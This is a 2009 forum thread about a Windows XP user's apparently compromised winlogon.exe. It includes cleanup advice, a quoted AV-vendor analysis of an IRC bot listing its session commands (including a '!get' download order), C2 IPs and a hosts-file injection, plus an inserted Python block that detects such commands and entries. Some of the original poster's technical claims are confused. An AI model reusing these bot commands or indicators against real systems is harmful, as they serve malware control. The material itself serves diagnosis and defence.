DigeratiPrime Posted January 30, 2009

If I had Mod rights in this forum I would've cleaned up your run-on paragraph and possibly deleted some irrelevant information. You talk about your hard drives and partitions, then the software you used, then your wireless connection, then back to hard disks, then new claims of leakage in other Windows services, then the WHOIS information, which should be in a quote box or just linked to. All in one paragraph...

How can you scan with 45 known and UNKNOWN programs? Installing all that security software would probably create problems.
An SSID has nothing to do with passwords or keys.
MFT has nothing to do with MBR.
I get the sense you are ignoring our advice on how to remove this, and seem more interested in finding the source. Well, you're probably wasting your time; those IP addresses are probably from a botnet using fast flux DNS. Unfortunately I am not sure I want to feed you more lingo to abuse.
Kelsenellenelvian Posted January 30, 2009

WOW, from reading (and trying to decipher your paragraph) you seem to have little knowledge of all of the crud you are using. 45 known and unknown??? A lot of those "Anti-Spyware" apps are just the opposite.

How to fix?
#1 Make yourself an Ultimate Boot CD for Windows ON A DIFFERENT PC. Yes, it is legal and free!
#2 Take your system offline and QUIT FEEDING the leeches!
#3 Run your UBCD4Win and scan EVERYTHING!
#4 Reinstall Windows ONLY (leave the other danged OSes alone until you are secure).
#5 Install 1 anti-virus. Like ESET Smart Security (NOD32) or Kaspersky, whatever, just not Norton's for the sake of the gods that be.
#6 Get a really good firewall!
#7 Rescan everything from within Windows.

Now for gods' sake, after you get Windows reinstalled, reorganize everything and surf safer!
cTreamer (Author) Posted January 30, 2009

I wanted just to say that I've tried everything, with each piece of software that I have. They find nothing on all my partitions F, G, H, but there is something that is manipulating my winlogon.exe. My second PC, a notebook, is also on Windows XP, and there winlogon.exe is also in memory, doing only its job and nothing else.

The idea with the W-LAN (war-driving) came from somebody at the police central here in my city, but I dropped it fast because it's not my case. I took WinHex v15.1 SR8 and looked inside all my partitions. I saw files that are normally hidden from view: Master Boot Record, Master File Table, log files, deleted hidden files and all this forensic stuff you know. Everything was clean there, no hidden virus, trojans, rootkit, worms & co. that could be hiding there. So all these things can be excluded as the reason for my winlogon.exe manipulation problem.

Actually there are more than 36,000 infected networks and PCs in China, all because of the Conficker worm. My winlogon.exe is connecting exactly to this region near China. So maybe it's not Conficker but another parasite that scans IP addresses of users day and night and, when it finds some Windows security leakage, tries to connect to its sub-services (DCOM, RPC Locator), which finally download the rest of the crap. I just don't understand why this is not happening with my notebook, which also has XP. So if somebody knows a hotfix, update or patch against this, it is welcome. I only know about the Conficker patch and I've installed it already. Maybe I am missing some hotfixes on my system, I don't know. Every help is welcome!!!

Thanks to the Admins & Mods for their passion!!!

Greetings
cTreamer - Germany
DigeratiPrime Posted January 30, 2009

I see that you are German, but are you making an effort to understand our posts? Please read what a rootkit is.
http://en.wikipedia.org/wiki/Rootkit
http://de.wikipedia.org/wiki/Rootkit

Post a HiJackThis log
http://www.trendsecure.com/portal/en-US/to...ckthis/download

You could check this location in the registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
C:\Windows\system32\userinit.exe,

Also here is a screenshot from Sysinternals Process Explorer showing the threads in my winlogon.exe process (Vista Ultimate SP1 x64).
cTreamer (Author) Posted January 31, 2009 (edited)

So first, I am an Armenian citizen (nationality) and not German, OK. Both English and German are not my mother languages. So your language, your rules, anyway, because there must be some solution for this problem. OK, let's do it all the right way. So that you understand what I am talking about with this nerve-racking winlogon.exe, here is a screenshot from AnVir Task Manager Pro. Below all the processes is another section where you can see and investigate all the details of a program, including TCP & UDP connections and all details of them. Unfortunately I cannot show you the winlogon.exe in action, downloading all that crap, because I have already blocked it with the anti-rootkit tool GMER v1.1, so it is no longer connecting in the TCP & UDP register. Here it is:
http://i39.tinypic.com/10o3bpk.jpg
http://i42.tinypic.com/a4psa0.jpg
http://i42.tinypic.com/10hktwm.jpg

In the Task Manager, the blue-marked line (hope you can see it) with the cursor is my winlogon.exe service, OK!

Greetings
cTreamer

System: nLite Win XP Pro + SP3 + ALL Addons-Updates from Sereby-Dynaletik
Router: D-Link DSL 2741B W-LAN 300 Mbit/s hardware firewall

If you need some more screenshots just say so, OK. Thank you!
cTreamer

Edited February 4, 2009 by Tarun
DigeratiPrime Posted February 1, 2009

FYI: When you save screenshots use PNG format since it's lossless. Also you can use Alt+PrintScreen to capture just the active window.

FYI: With Process Explorer you can increase the Difference Highlighting Duration so you have more time to analyze and take a screenshot.

If you want to have a known clean computer you should format your system partition and reinstall Windows. You could do a repair install or replace individual files with the Recovery Console, but that will take more time and might not work.
cTreamer (Author) Posted February 2, 2009

I have already done it like this. First, with the special software LSoft Bootdisc v3.0, I overwrote the C:\ partition (DoD method, Peter Gutmann, zeros), and more than once. After that I checked with a hex editor that nothing had survived, seeing only zeros on C:\ and completely free space again. So then I installed Windows XP made with nLite. I have done this over 1000 times from November 2008 until now and it is not helping. I know only one thing: since I have been trying to slipstream SP3 into XP I've had these problems. I don't know what more I should do. Should I write an email directly to Microsoft here in Germany? What do you think, could Microsoft help me???

Greetings
cTreamer
Glaukus Posted February 3, 2009

Hi

I have signed up on this site to share my experience with this same exact problem in the last 48 hours.

I have the same exact symptoms. Winlogon.exe is reaching out to the same IP and more malware is eventually loaded. The original offender is currently undetectable.

I managed to find out how I was getting infected. It turns out an exe file is being loaded automatically via a script that I have. The original exe, which is present in a network share, was modified "somehow" in the last few days. Once this exe runs, Winlogon.exe starts to connect to the IP automatically and the rest of the malware follows.

The file has been submitted to the AV company, but after 2 days they haven't been successful in deconstructing the virus.

Once I know more about the behavior I will try to post here.

Good luck
cTreamer (Author) Posted February 3, 2009

Oh, finally somebody who believes me, because most people are thinking I am crazy or so. Thanks for that, what you wrote is great, now I understand how it is working. We both just have to find out where this script + virus.exe is that is reverse engineering the original winlogon.exe. So I am waiting for your results from the AV company. I am going to stay in good contact with you.

Greetings
cTreamer

Wish you good luck too!!!
Glaukus Posted February 4, 2009 (edited)

Here is the latest from the AV company
------------------------
This malware connects to an IRC channel.

Connection information:
NICK gvhmdwhu
USER z020501 . . :#074711ecc
JOIN #.364:u.
PRIVMSG jepabvnu :!get REMOVED URL
:i.PONG :i.
PING :i.PONG :i.
PING :i.PONG :i.
PING :i.PONG :i.
PING :i.PONG :i.
PING :i.PONG :i.
PING :i.PONG :i.
PING :i.

Downloads this particular file REMOVED URL which is detected as (Generic Downloader.x). It adds an entry into the hosts file (127.0.0.1 ZieF.pl).

It opens a port on the infected machine and waits for commands on the IRC channel. It also infects .exe files.

Network activity:
Connects to various IPs
1. 58.65.232.34
2. 211.95.79.6
3. 218.93.202.114
4. 61.235.117.81
---------------------------------------

It is worth blocking the IPs, or rather putting fake DNS entries for all those connections. For us, we found the source EXE so we have removed it. The infected workstations are slowly getting reimaged.

One more note. The AV company after a full 48 hours is still fighting for a solution. This is not yet widespread worldwide based on what they tell me. In my view it cannot be cleaned. It compromises too many OS files.

Crazy stuff.....

Once you identify the source just remove that and proceed with the reimaging of your PCs. Also don't forget that if this thing stays live for long it may change behaviour, since it probably can autoupdate.

Good luck

Edited February 4, 2009 by Tarun
Removed malicious url
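As an added example (not from the thread or the AV vendor), two small Python checks a defender could build around the behaviour the report above describes: one pulls the nick, the joined channel and any "!get <url>" download command out of a captured IRC session of the shape shown, the other flags hosts-file lines that pin a non-local hostname to the loopback address. The session text, the download URL (a placeholder) and the hosts sample are constructed, not captures from the thread.

```python
"""Detection helpers for the IRC-bot behaviour described in the AV report."""

# Constructed sample session, shaped like the report's NICK/USER/JOIN/PRIVMSG lines.
# The URL is a labelled placeholder standing in for the vendor's "REMOVED URL".
SAMPLE_IRC_SESSION = """\
NICK gvhmdwhu
USER z020501 . . :#074711ecc
JOIN #.364:u.
PRIVMSG jepabvnu :!get http://PLACEHOLDER.example/0032.exe
PING :i.
PONG :i.
"""

# Constructed hosts file: the stock German template header plus one injected entry.
SAMPLE_HOSTS = """\
# Dies ist eine HOSTS-Beispieldatei
127.0.0.1       localhost
127.0.0.1 ZieF.pl
"""

LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def extract_irc_indicators(session: str) -> dict:
    """Return nick, joined channels and '!get' download targets from an IRC session."""
    found = {"nick": None, "channels": [], "downloads": []}
    for raw in session.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        params, _, trailer = rest.partition(" :")  # IRC trailing parameter begins ' :'
        if cmd == "NICK":
            found["nick"] = params
        elif cmd == "JOIN":
            found["channels"].append(params)
        elif cmd == "PRIVMSG" and trailer.startswith("!get "):
            found["downloads"].append(trailer[len("!get "):].strip())
        # PING/PONG keep-alives and USER carry nothing we need to report.
    return found


def suspicious_hosts_entries(hosts_text: str) -> list:
    """Return hosts-file lines mapping a non-local name onto a 127.x.x.x address."""
    hits = []
    for raw in hosts_text.splitlines():
        body = raw.split("#", 1)[0].strip()  # drop comments
        if not body:
            continue
        addr, *names = body.split()
        if addr.startswith("127.") and any(n.lower() not in LOCAL_NAMES for n in names):
            hits.append(body)
    return hits
```

The hosts heuristic is deliberately narrow (loopback only), so legitimate custom entries pointing elsewhere are not reported; treat a hit as something to review, not as proof of infection.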
cTreamer (Author) Posted February 4, 2009 (edited)

Look at my hosts file entries:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows 2000.
#
# This file contains the mappings of IP addresses to host names.
# Each entry should be kept on an individual line. The IP address
# should be placed in the first column followed by the corresponding
# host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost

Do you mean this file, located in C:\Windows\System32\Drivers\etc\hosts??? I don't see a (127.0.0.1 ZieF.pl) entry.

So now I only have to find that 0032.exe or 0032.exePING?. I've got 3 file partitions F, G, H. I am going to try first with Windows Search. What do you think, can Windows Search find this 0032.exe file, or what else should I try? One thing that I don't understand is what this small consulting service company in Poland has to do with this. Because the domain is:

Host: ircd.zief.pl
Port: 80

and the owner of this ircd.zief.pl is:

DOMAIN: zief.pl
registrant's handle: sibr62259 (INDIVIDUAL)
nameservers: dns1.zief.pl. [58.65.232.33]
dns2.zief.pl. [58.65.232.34]
created: 2005.07.25 15:58:55
last modified: 2008.09.25 10:49:06
no option
REGISTRAR: Consulting Service "Exactly This Company"
ul. Domaniewska 35A lok.1B
02-672 Warszawa
Polska/Poland
+48.22 8538888
domeny@ConsultingService.pl

WHOIS displays data with a delay not exceeding 15 minutes in relation to the .pl Registry system
Registrant data available at http://dns.pl/cgi-bin/en_whois.pl
_____
NeoTrace Copyright ©1997-2001 NeoWorx Inc

It's a really crazy thing that it redirects to Chinese IP ranges but the domain host is in Poland. It is very difficult to understand these cascading IP masquerading mechanisms they use to hide their traces and sources.

Greetings
cTreamer

Edited February 5, 2009 by cTreamer
Glaukus Posted February 4, 2009

I am just giving you the info I have about my case.

Did you run Prevx CSI against your PC?

McAfee will provide a Stinger utility soon. I will post once I have more info.
cTreamer (Author) Posted February 4, 2009 (edited)

No, I've only tried Prevx EDGE Free Edition. It finds nothing, you know. So I've downloaded Prevx CSI Free Edition and it is scanning now.

No, Prevx CSI has found nothing on my Windows C:\. Still no results. I think it is going to take some weeks before I find out where it is hidden on my system. I need some strong tool that also scans my other 3 partitions and not just C:\, you know. With this Prevx CSI Free Edition only C:\ can be scanned and not the other partitions. Where on your computer's partitions is this file hidden, have you already found out??? Because I think it is not on C:, it is somewhere else, in another partition, in files like RAR, ZIP, setups, MSI, CAB, EXE, DLL, SYS, INI, INF or so.

Searching Google I've found one very useful site: http://mtc.sri.com/ . They treat all kinds of such difficult-to-find stuff. What is interesting is that I have found exactly the same report as yours, you know. Here is a screenshot from http://mtc.sri.com/ :

Edited February 5, 2009 by cTreamer